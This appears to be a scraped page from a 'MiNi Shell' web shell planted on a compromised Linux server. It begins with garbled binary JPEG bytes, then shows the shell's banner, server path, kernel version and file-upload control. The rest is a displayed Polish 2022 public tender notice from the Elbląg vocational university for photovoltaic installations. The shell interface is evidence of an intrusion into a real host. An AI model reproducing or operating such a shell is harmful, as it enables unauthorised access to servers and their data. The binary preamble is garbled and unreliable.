JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220203/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220203/0004557101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa systemu fotowoltaicznego w obiektach Państwowej Wyższej Szkoły Zawodowej w Elblągu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowa Wyższa Szkoła Zawodowa w Elblągu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170711628</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">556290553</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@pwsz.elblag.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pwsz.elblag.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa systemu fotowoltaicznego w obiektach Państwowej Wyższej Szkoły Zawodowej w Elblągu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-03ecc1b6-843a-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00045571</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.pwsz.elblag.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://www.pwsz.elblag.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”. Dostęp do ww. formularzy Wykonawca może uzyskać ponadto poprzez miniportal UZP<br/>za pomocą adresu internetowego: https://miniportal.uzp.gov.pl/FormsRedirect.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP), dostępnym pod adresem<br/>internetowym: https://miniportal.uzp.gov.pl/WarunkiUslugi.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB i<br/>uzależniony jest od parametrów technicznych systemu ePUAP oraz miniPortalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/TP/2312/02/214/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa systemu fotowoltaicznego w obiekcie Państwowej Wyższej Szkoły Zawodowej w Elblągu przy Al. Grunwaldzkiej 137.<br/>1)	Przedmiotem zamówienia jest budowa systemu fotowoltaicznego o mocy 49 kWp wraz z niezbędną infrastrukturą techniczną w obiekcie Państwowej Wyższej Szkoły Zawodowej w Elblągu przy Al. Grunwaldzka 137 w zakresie:<br/>a)	Budowy systemu fotowoltaicznego obejmującą:<br/>-	montaż instalacji fotowoltaicznej,<br/>-	budowę linii kablowych nn-0,4kV w obiekcie,<br/>-	budowę sieci transmisji danych,<br/>-	montaż szaf kablowych i inwerterów,<br/>-	budowę instalacji uziemienia, odgromowej i połączeń wyrównawczych dla systemu fotowoltaicznego,<br/>-	ochronę przeciwprzepięciową,<br/>-	ochronę przeciwporażeniową,<br/>-	ochronę przeciwpożarową.<br/>-	wyłączniki PWP po stronie AC i DC zlokalizowany przy wejściu do budynku.<br/>b)	Opracowania projektu wykonawczego, na podstawie projektu architektoniczno – budowlanego stanowiącego Załącznik nr 1.1 do SWZ, zgodnie z obowiązującymi przepisami prawa, w tym:<br/>-	Wykonania ponownych symulacji i obliczeń technicznych systemu fotowoltaicznego w oparciu o własne zakładane do montażu produkty w/w systemu.<br/>-	Obliczenia konstrukcyjne dachu i jego wytrzymałości z oferowanym systemem fotowoltaicznym.<br/>-	Wykonania doboru systemu fotowoltaicznego w oparciu o dedykowane układy falownikowe i panele wskazane przez Polskie Towarzystwo Przesyłu i Rozdziału Energii Elektrycznej - dalej PTPiREE jako Wykaz Certyfikowanych Urządzeń uznawany przez Energa-Operator Oddział w Elblągu. Aleja Józefa Piłsudskiego 2 82-300 Elbląg – dalej ENERGA - OPRTATOR, a także wykona stosowne zgłoszenia do Państwowej Straży Pożarnej w Elblągu – dalej PSP wraz z opinią rzeczoznawcy d. spraw przeciwpożarowych. <br/>-	Uwzględni występujące zacienienia od realizacyjnych obiektów w opracowanym schemacie symulacyjnym. Przy czym Zamawiający dopuszcza zmianę lokalizacji paneli fotowoltaicznych na dachach obiektów Zamawiającego przy czym efekt uzyskania energetyczny roczny i systemowy musi być równy lub większy niż wskazany w obliczeniowych projektowych dokumentacji stanowiącej Załącznik Nr 1 do SWZ. Zmianę lokalizacji rozmieszczenia paneli na dachach obiektów musi być potwierdzeniu przez autora projektu stanowiącego Załącznik Nr 1 SWZ i Zamawiającego.<br/>-	Złożenia wniosków materiałowych i uzgodnienia materiałów z Inspektorem nadzoru powołanego przez Zamawiającego i z Zamawiającym.<br/>c)	Nie później niż do 31 marca 2022r zgłoszenia przyłączenia mikroinstalacji do sieci ENERGA -OPERATOR na obowiązującym druku ENERGA - OPERATOR wraz z niezbędnymi dokumentami i oświadczeniami, w tym Oświadczeniem, o którym mowa w art. 7 ust. 8d6 Prawo energetyczne oraz Oświadczeniem instalatora mikroinstalacji.<br/>d)	Niezbędne uzgodnienia dokumentacji i uzyskania wszystkich pozwoleń w ENERGA - OPERATOR w zakresie nowego olicznikowania dwukierunkowego oraz niezbędne uzgodnienia dokumentacji z PSP i uzyskanie od niej pozytywnej oceny przyjętych rozwiązań, jeśli ocena będzie wymagana.<br/>e)	Wykonanie Instrukcji Eksploatacji Sytemu.<br/>f)	Dokonania stosownych uzgodnień z rzeczoznawcą do spraw przeciwpożarowych projektu wykonawczego i powykonawczego oraz niezbędnych zgłoszeń dla PSP i ENERGA – OPERATOR.<br/>g)	Opracowania dokumentacji powykonawczej wraz z instrukcją użytkowania.<br/>h)	Przekazania kompletnego systemu fotowoltaicznego do użytkowania Zamawiającemu.<br/>2)	Wykonawca udzieli Zamawiającemu gwarancji jakości na wykonane przedmiotu umowy w tym dokumentacji projektowej i roboty budowlane przez okres 3 lat oraz na zainstalowane urządzenia przez okres 15 lat od daty końcowego odbioru robót. W wymienionych terminach Wykonawca zobowiązany jest do bezpłatnego usuwania ujawnionych wad. <br/>3)	W ramach gwarancji przez okres 3 lat Wykonawca 2 razy w roku wykona bezpłatne przeglądy gwarancyjne systemu fotowoltaicznego wraz z ewentualnymi naprawami gwarancyjnymi. Przeglądy wykonane będą przez wykwalifikowane osoby posiadające również stosowne doświadczenie, Z przeglądu sporządzony zostanie protokół, który przekazany będzie w ciągu 3 dni roboczych Zamawiającemu. Nie dotyczy to zakresu konserwacji systemu fotowoltaicznego.<br/>4)	Szczegółowo zakres zamówienia w tym zakres inwestycji, warunki gwarancje i sposób realizacji i odbioru robót określony został w:<br/>a)	Dokumentacji stanowiącej Załącznik nr 1.1 do SWZ - Projekt architektoniczno - budowlany - Zmniejszenie energochłonności obiektu dydaktycznego przy Al. Grunwaldzkiej 137 w Elblągu poprzez produkcję energii elektrycznej z systemu instalacji fotowoltaicznej o mocy 49 kWp.<br/>b)	Projekcie umowy stanowiącym ZAŁĄCZNIK Nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">51112000-0 - Usługi instalowania sprzętu sterowania i przesyłu energii elektrycznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Uzysk mocy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki serwisu gwarancyjnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa systemu fotowoltaicznego w obiekcie Państwowej Wyższej Szkoły Zawodowej w Elblągu przy ul. Czerniakowskiej 22.<br/>1)	Przedmiotem zamówienia jest budowa systemu fotowoltaicznego o mocy 45 kWp wraz z niezbędną infrastrukturą techniczną w obiekcie Państwowej Wyższej Szkoły Zawodowej w Elblągu przy ul. Czerniakowskiej 22.w zakresie:<br/>a)	Budowy systemu fotowoltaicznego obejmującą:<br/>-	montaż instalacji fotowoltaicznej,<br/>-	budowę linii kablowych nn-0,4kV w obiekcie,<br/>-	budowę sieci transmisji danych,<br/>-	montaż szaf kablowych i inwerterów,<br/>-	budowę instalacji uziemienia, odgromowej i połączeń wyrównawczych dla systemu fotowoltaicznego,<br/>-	ochronę przeciwprzepięciową,<br/>-	ochronę przeciwporażeniową,<br/>-	ochronę przeciwpożarową.<br/>-	wyłączniki PWP po stronie AC i DC zlokalizowany przy wejściu do budynku.<br/>b)	Opracowania projektu wykonawczego, na podstawie projektu architektoniczno – budowlanego stanowiącego Załącznik nr 1.1 do SWZ, zgodnie z obowiązującymi przepisami prawa, w tym:<br/>-	Wykonania ponownych symulacji i obliczeń technicznych systemu fotowoltaicznego w oparciu o własne zakładane do montażu produkty w/w systemu.<br/>-	Obliczenia konstrukcyjne dachu i jego wytrzymałości z oferowanym systemem fotowoltaicznym.<br/>-	Wykonania doboru systemu fotowoltaicznego w oparciu o dedykowane układy falownikowe i panele wskazane przez Polskie Towarzystwo Przesyłu i Rozdziału Energii Elektrycznej - dalej PTPiREE jako Wykaz Certyfikowanych Urządzeń uznawany przez Energa-Operator Oddział w Elblągu. Aleja Józefa Piłsudskiego 2 82-300 Elbląg – dalej ENERGA - OPRTATOR, a także wykona stosowne zgłoszenia do Państwowej Straży Pożarnej w Elblągu – dalej PSP wraz z opinią rzeczoznawcy d. spraw przeciwpożarowych. <br/>-	Uwzględni występujące zacienienia od realizacyjnych obiektów w opracowanym schemacie symulacyjnym. Przy czym Zamawiający dopuszcza zmianę lokalizacji paneli fotowoltaicznych na dachach obiektów Zamawiającego przy czym efekt uzyskania energetyczny roczny i systemowy musi być równy lub większy niż wskazany w obliczeniowych projektowych dokumentacji stanowiącej Załącznik Nr 1 do SWZ. Zmianę lokalizacji rozmieszczenia paneli na dachach obiektów musi być potwierdzeniu przez autora projektu stanowiącego Załącznik Nr 1 SWZ i Zamawiającego.<br/>-	Złożenia wniosków materiałowych i uzgodnienia materiałów z Inspektorem nadzoru powołanego przez Zamawiającego i z Zamawiającym.<br/>c)	Nie później niż do 31 marca 2022r zgłoszenia przyłączenia mikroinstalacji do sieci ENERGA -OPERATOR na obowiązującym druku ENERGA - OPERATOR wraz z niezbędnymi dokumentami i oświadczeniami, w tym Oświadczeniem, o którym mowa w art. 7 ust. 8d6 Prawo energetyczne oraz Oświadczeniem instalatora mikroinstalacji.<br/>d)	Niezbędne uzgodnienia dokumentacji i uzyskania wszystkich pozwoleń w ENERGA - OPERATOR w zakresie nowego olicznikowania dwukierunkowego oraz niezbędne uzgodnienia dokumentacji z PSP i uzyskanie od niej pozytywnej oceny przyjętych rozwiązań, jeśli ocena będzie wymagana.<br/>e)	Wykonanie Instrukcji Eksploatacji Sytemu.<br/>f)	Dokonania stosownych uzgodnień z rzeczoznawcą do spraw przeciwpożarowych projektu wykonawczego i powykonawczego oraz niezbędnych zgłoszeń dla PSP i ENERGA – OPERATOR.<br/>g)	Opracowania dokumentacji powykonawczej wraz z instrukcją użytkowania.<br/>h)	Przekazania kompletnego systemu fotowoltaicznego do użytkowania Zamawiającemu.<br/>2)	Wykonawca udzieli Zamawiającemu gwarancji jakości na wykonane przedmiotu umowy w tym dokumentacji projektowej i roboty budowlane przez okres 3 lat oraz na zainstalowane urządzenia przez okres 15 lat od daty końcowego odbioru robót. W wymienionych terminach Wykonawca zobowiązany jest do bezpłatnego usuwania ujawnionych wad. <br/>3)	W ramach gwarancji przez okres 3 lat Wykonawca 2 razy w roku wykona bezpłatne przeglądy gwarancyjne systemu fotowoltaicznego wraz z ewentualnymi naprawami gwarancyjnymi. Przeglądy wykonane będą przez wykwalifikowane osoby posiadające również stosowne doświadczenie, Z przeglądu sporządzony zostanie protokół, który przekazany będzie w ciągu 3 dni roboczych Zamawiającemu. Nie dotyczy to zakresu konserwacji systemu fotowoltaicznego.<br/>4)	Szczegółowo zakres zamówienia w tym zakres inwestycji, warunki gwarancje i sposób realizacji i odbioru robót określony został w:<br/>a)	Dokumentacji stanowiącej Załącznik nr 1.2 do SWZ - Projekt architektoniczno - budowlany - Zmniejszenie energochłonności obiektu dydaktycznego przy Czerniakowskiej 22 w Elblągu poprzez produkcję energii elektrycznej z systemu instalacji fotowoltaicznej o mocy 45 kWp.<br/>b)	Projekcie umowy stanowiącym ZAŁĄCZNIK Nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">51112000-0 - Usługi instalowania sprzętu sterowania i przesyłu energii elektrycznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Uzysk mocy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki serwisu gwarancyjnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa systemu fotowoltaicznego w obiekcie Państwowej Wyższej Szkoły Zawodowej w Elblągu przy ul. Wspólnej 11-13.<br/>1)	Przedmiotem zamówienia jest budowa systemu fotowoltaicznego o mocy 49 kWp wraz z niezbędną infrastrukturą techniczną w obiekcie Państwowej Wyższej Szkoły Zawodowej w Elblągu przy ul. Wspólnej 11-13.w zakresie:<br/>a)	Budowy systemu fotowoltaicznego obejmującą:<br/>-	montaż instalacji fotowoltaicznej,<br/>-	budowę linii kablowych nn-0,4kV w obiekcie,<br/>-	budowę sieci transmisji danych,<br/>-	montaż szaf kablowych i inwerterów,<br/>-	budowę instalacji uziemienia, odgromowej i połączeń wyrównawczych dla systemu fotowoltaicznego,<br/>-	ochronę 